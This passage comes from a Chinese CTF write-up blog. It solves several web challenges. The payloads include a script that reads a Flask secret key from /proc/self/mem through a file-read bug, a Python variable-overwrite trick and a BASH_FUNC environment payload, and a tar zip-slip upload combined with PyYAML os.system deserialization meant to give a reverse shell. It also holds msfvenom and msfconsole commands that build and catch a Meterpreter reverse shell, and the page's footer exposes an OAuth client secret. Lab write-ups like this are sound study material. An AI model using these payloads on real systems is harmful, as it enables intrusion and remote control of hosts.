class="line">            f.seek(start)</span><br><span class="line">            data=f.read(end)</span><br><span class="line">            return data</span><br><span class="line">@app.route(&quot;/&lt;path:path&gt;&quot;)</span><br><span class="line">def render_page(path):</span><br><span class="line">    print(os.path.pardir)</span><br><span class="line">    print(path)</span><br><span class="line">    if not os.path.exists(&quot;templates/&quot; + path):</span><br><span class="line">        return &quot;not found&quot;, 404</span><br><span class="line">    return render_template(path)</span><br><span class="line">if __name__==&#x27;__main__&#x27;:</span><br><span class="line">    app.run(</span><br><span class="line">        debug=False,</span><br><span class="line">        host=&quot;0.0.0.0&quot;</span><br><span class="line">    )</span><br><span class="line">    print(app.config[&#x27;SECRET_KEY&#x27;])</span><br></pre></td></tr></table></figure>

<p>首先就是去伪造session 老考点了 通过计算内存偏移量来读取内存中的secretkey</p>
<p>读取<code>/proc/self/maps</code>可以得到当前进程的内存映射关系，通过读该文件的内容可以得到内存代码段基址。</p>
<p><code>/proc/self/mem</code>是进程的内存内容，通过修改该文件相当于直接修改当前进程的内存。该文件不能直接读取，需要结合maps的映射信息来确定读的偏移值。即无法读取未被映射的区域，只有读取的偏移值是被映射的区域才能正确读取内存内容。</p>
<p>脚本如下:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">import os</span><br><span class="line">import  re</span><br><span class="line">import requests</span><br><span class="line">url=&quot;http://8.130.34.53:8848&quot;</span><br><span class="line">maps_url = f&quot;&#123;url&#125;/read?file=/proc/self/maps&quot;</span><br><span class="line">maps_reg = &quot;([a-z0-9]&#123;12&#125;-[a-z0-9]&#123;12&#125;) rw.*?00000000 00:00 0&quot;</span><br><span class="line">maps = re.findall(maps_reg, requests.get(maps_url).text)</span><br><span class="line">print(maps)</span><br><span class="line">#print(requests.get(maps_url).text)</span><br><span class="line">for m in maps:</span><br><span class="line">    print(m)</span><br><span class="line">    start, end = m.split(&quot;-&quot;)[0], m.split(&quot;-&quot;)[1]</span><br><span class="line">    Offset, Length = str(int(start, 16)), str(int(end, 16) - int(start, 16))</span><br><span class="line">    read_url = f&quot;&#123;url&#125;/read?file=/proc/self/mem&amp;start=&#123;Offset&#125;&amp;end=&#123;Length&#125;&quot;</span><br><span class="line">    s = requests.get(read_url).content</span><br><span class="line">    rt = re.findall(b&quot;[a-z0-9]&#123;8&#125;\*[a-z0-9]&#123;4&#125;\*[a-z0-9]&#123;4&#125;\*[a-z0-9]&#123;4&#125;\*[a-z0-9]&#123;12&#125;Boogipopisweak&quot;, s)</span><br><span class="line">    print(rt)</span><br></pre></td></tr></table></figure>

<p>然后就是我不知道的知识了 直接来看神のWP<br>首先是python的一个黑魔法导致变量覆盖</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694011985226-0e294a99-187a-45f7-9268-6a56df3e24ad.png" alt="img"></p>
<p>所以利用点在这里:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec(f&#x27;for [&#123;name&#125;] in [&#123;m1sery&#125;]:print(&quot;strange?&quot;)&#x27;)</span><br></pre></td></tr></table></figure>

<p>其次我们是不是可以覆盖环境变量 当然神已经考虑到了：</p>
<blockquote>
<p>那么假如我们想覆盖环境变量可以怎么做呢？</p>
<p><code>[[str][0]for[os.environ[&#39;BASH_FUNC_echo%%&#39;]]in[[&#39;() &#123; id; &#125;&#39;]]]</code></p>
<p>按照上述代码就可以覆盖环境变量，调用了os模块进行污染，如上代码可以rce输出id指令，但是我在题目里ban了，因此是不可行的。</p>
</blockquote>
<p>这里涉及到之前idek考的一个pydash原型链污染的非预期了，是通过污染<code>os.path.pardir</code>这个变量来允许目录穿越的，我们污染了os.path.pardir就可以实现路径穿越了 修改的值为任意 </p>
<p>来自：<a target="_blank" rel="noopener" href="https://tttang.com/archive/1876/#toc_ospathpardir">https://tttang.com/archive/1876/#toc_ospathpardir</a></p>
<p>至于为什么嘛 分析源码分析的 。。。。qwq？？？？？？？ 🐂 我记住结论了:)</p>
<p>因此整个步骤为:</p>
<ol>
<li>从内存中通过偏移量读取secretkey 伪造session</li>
<li>然后利用python黑魔法去污染os.path.pardir</li>
<li>路径穿越读flag</li>
</ol>
<p>环境给的flag位于&#x2F;tmp&#x2F;flag中 所以路径穿越即可 记得路径要url编码</p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694012734069-f27e4a64-739c-4798-bbba-e4a8545c51b6.png" alt="img"></p>
<p>真不错啊 学到知识好多！</p>
<h2 id="ezyaml"><a href="#ezyaml" class="headerlink" title="ezyaml"></a>ezyaml</h2><p>源码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">import tarfile</span><br><span class="line">from flask import Flask, render_template, request, redirect</span><br><span class="line">from hashlib import md5</span><br><span class="line">import yaml</span><br><span class="line">import os</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">def waf(s):  #设置waf</span><br><span class="line">    flag = True</span><br><span class="line">    blacklist = [&#x27;bytes&#x27;,&#x27;eval&#x27;,&#x27;map&#x27;,&#x27;frozenset&#x27;,&#x27;popen&#x27;,&#x27;tuple&#x27;,&#x27;exec&#x27;,&#x27;\\&#x27;,&#x27;object&#x27;,&#x27;listitems&#x27;,&#x27;subprocess&#x27;,&#x27;object&#x27;,&#x27;apply&#x27;]</span><br><span class="line">    for no in blacklist:</span><br><span class="line">        if no.lower() in str(s).lower():</span><br><span class="line">            flag= False</span><br><span class="line">            print(no)</span><br><span class="line">            break</span><br><span class="line">    return flag</span><br><span class="line">def extractFile(filepath, type):     </span><br><span class="line"></span><br><span class="line">    extractdir = filepath.split(&#x27;.&#x27;)[0]  #获取上传文件的文件名不包括后缀</span><br><span class="line">    if not os.path.exists(extractdir):</span><br><span class="line">        os.makedirs(extractdir)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    if type == &#x27;tar&#x27;:</span><br><span class="line">        tf = tarfile.TarFile(filepath) #创建了一个 tarfile.TarFile 对象，用于操作tar压缩文件</span><br><span class="line">        tf.extractall(extractdir)  #将tar文件中的所有内容解压到指定的目录extractdir中</span><br><span class="line">        return tf.getnames()  #获取解压后的文件名列表并且返回</span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/&#x27;, methods=[&#x27;GET&#x27;])</span><br><span class="line">def main():</span><br><span class="line">        fn = &#x27;uploads/&#x27; + md5().hexdigest()  #创建文件上传路径初始化</span><br><span class="line">        if not os.path.exists(fn):</span><br><span class="line">            os.makedirs(fn)</span><br><span class="line">        return render_template(&#x27;index.html&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/upload&#x27;, methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span><br><span class="line">def upload():</span><br><span class="line"></span><br><span class="line">    if request.method == &#x27;GET&#x27;:</span><br><span class="line">        return redirect(&#x27;/&#x27;)</span><br><span class="line"></span><br><span class="line">    if request.method == &#x27;POST&#x27;:</span><br><span class="line">        upFile = request.files[&#x27;file&#x27;]</span><br><span class="line">        print(upFile)</span><br><span class="line">        if re.search(r&quot;\.\.|/&quot;, upFile.filename, re.M|re.I) != None:  #匹配上传的文件名包不包括..或者/并且匹配多行和大小写</span><br><span class="line">            return &quot;&lt;script&gt;alert(&#x27;Hacker!&#x27;);window.location.href=&#x27;/upload&#x27;&lt;/script&gt;&quot;</span><br><span class="line"></span><br><span class="line">        savePath = f&quot;uploads/&#123;upFile.filename&#125;&quot;</span><br><span class="line">        print(savePath) </span><br><span class="line">        upFile.save(savePath) #保存文件</span><br><span class="line"></span><br><span class="line">        if tarfile.is_tarfile(savePath):  #用于检查给定的文件路径 savePath 是否是一个有效的tar压缩文件</span><br><span class="line">            zipDatas = extractFile(savePath, &#x27;tar&#x27;)</span><br><span class="line">            return render_template(&#x27;result.html&#x27;, path=savePath, files=zipDatas)</span><br><span class="line">        else:</span><br><span class="line">            return f&quot;&lt;script&gt;alert(&#x27;&#123;upFile.filename&#125; upload successfully&#x27;);history.back(-1);&lt;/script&gt;&quot;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.route(&#x27;/src&#x27;, methods=[&#x27;GET&#x27;])</span><br><span class="line">def src():</span><br><span class="line">    if request.args:</span><br><span class="line">        username = request.args.get(&#x27;username&#x27;)</span><br><span class="line">        with open(f&#x27;config/&#123;username&#125;.yaml&#x27;, &#x27;rb&#x27;) as f: #打开yaml文件</span><br><span class="line">            Config = yaml.load(f.read()) #反序列化点</span><br><span class="line">            return render_template(&#x27;admin.html&#x27;, username=&quot;admin&quot;, message=&quot;success&quot;)</span><br><span class="line">    else:</span><br><span class="line">        return render_template(&#x27;index.html&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &#x27;__main__&#x27;:</span><br><span class="line">    app.run(host=&#x27;127.0.0.1&#x27;, port=8000)</span><br></pre></td></tr></table></figure>

<p>大概分析在源码注释了 大致就需要我们进行一个路径穿越将我们上传后解压的文件穿越到<code>config/</code>这样我们的恶意文件才会被打开并且进行yaml反序列化</p>
<p>考点：tar的zipslip文件覆盖，yaml反序列化</p>
<p>文件内容为<code>!!python/object/apply:os.system [&quot;whoami&quot;]</code>改为反弹shell就行 来自<a target="_blank" rel="noopener" href="https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/#pythonobjectapply">https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/#pythonobjectapply</a> 我愿称之为王の宝库</p>
<p>之后就是打包了<code>tar cPvf a.tar ../../config/a.yaml</code></p>
<p>然后上传 访问&#x2F;src路由 传参usename&#x3D;a 即可触发反弹shell</p>
<h2 id="Ez-java"><a href="#Ez-java" class="headerlink" title="Ez_java"></a>Ez_java</h2><p>不会 没学</p>
<h2 id="Ez-web"><a href="#Ez-web" class="headerlink" title="Ez_web"></a>Ez_web</h2><p>考点：</p>
<ul>
<li>&#x2F;etc&#x2F;ld.so.preload配置文件 劫持</li>
</ul>
<p>简单理解在这个文件中我们可以设置一些恶意的文件绝对路径</p>
<p>然后在我们输入指令时 就会先预加载<code>ld.so.preload</code>这个文件中的内容 达到劫持效果</p>
<p>所以这道大致题目思路:</p>
<ol>
<li>先由msf生成一个木马 然后上传上去</li>
<li>然后在自己vps 起msfconsole 设置好相应的参数 开始监听等待反弹</li>
<li>然后在题目中随便执行一个指令就会被劫持了</li>
</ol>
<p>由于我没有环境只能大致复现一下 因为复现还给自己kali虚拟机整崩了 </p>
<p><img src="https://z1d10t-blog.oss-cn-shenzhen.aliyuncs.com/img/blog1694094226089-5913781d-64aa-45ea-a2b2-59f67b604c93.jpeg" alt="img"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#生成木马 这里有个点就是我只能在我vps的/root下生成木马 其他地方生成时都是permission denied 就算给了777都是这样</span><br><span class="line">msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=vps的ip LPORT=1000 -f elf-so -o evil.elf</span><br><span class="line">然后依次执行以下命令:</span><br><span class="line">#选择攻击载荷:</span><br><span class="line">use payload/linux/x64/meterpreter/reverse_tcp </span><br><span class="line">#展示相关信息</span><br><span class="line">show options</span><br><span class="line">#设置反弹接受shell的主机ip 这里设置成本机</span><br><span class="line">set lhost 0.0.0.0</span><br><span class="line">#监听ip 这里当时生成木马时端口是多少 就要设置成多少</span><br><span class="line">set lport 1000</span><br><span class="line">#开始执行利用</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>参考于:</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/whatday/article/details/108890018">https://blog.csdn.net/whatday/article/details/108890018</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/254388">https://www.anquanke.com/post/id/254388</a></p>
<p><a target="_blank" rel="noopener" href="http://162.14.111.237/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E4%B8%ADlinux%E5%BA%93%E6%96%87%E4%BB%B6%E5%8A%AB%E6%8C%81/">http://162.14.111.237/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94%E4%B8%ADlinux%E5%BA%93%E6%96%87%E4%BB%B6%E5%8A%AB%E6%8C%81/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/162604.html">https://www.freebuf.com/column/162604.html</a></p>
<p>都是上好的文章</p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="EZ-misc"><a href="#EZ-misc" class="headerlink" title="EZ_misc"></a>EZ_misc</h2><p>跟之前*CTF考点一样 CVE-2023-28303</p>
<p><a target="_blank" rel="noopener" href="https://github.com/frankthetank-music/Acropalypse-Multi-Tool">https://github.com/frankthetank-music/Acropalypse-Multi-Tool</a> 直接用工具梭哈恢复就行了</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/post/c7a57718.html" rel="prev" title="NSSCTF 2nd WP与学习">
                  <i class="fa fa-chevron-left"></i> NSSCTF 2nd WP与学习
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/post/eb0674ad.html" rel="next" title="JS简单基础学习">
                  JS简单基础学习 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






    <div class="comments gitalk-container"></div>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">陇ICP备2023001761号-1 </a>
  </div>

<div class="copyright">
  &copy; 2023.2 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Z1d10t</span>
</div>



    </div>
  </footer>

  

  <a href="https://github.com/Z1d10t" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  




<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"Z1d10t","repo":"Z1d10t.github.io","client_id":"c9dd41fa890386350257","client_secret":"c78f6b60a410862c2dcc596f09db2f0c06f025c6","admin_user":"Z1d10t","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.8.0/gitalk.min.js","integrity":"sha256-MVK9MGD/XJaGyIghSVrONSnoXoGh3IFxLw0zfvzpxR4="},"path_md5":"9dd8811e8116b977cba57bf2b16d1763"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>

</body>
</html>

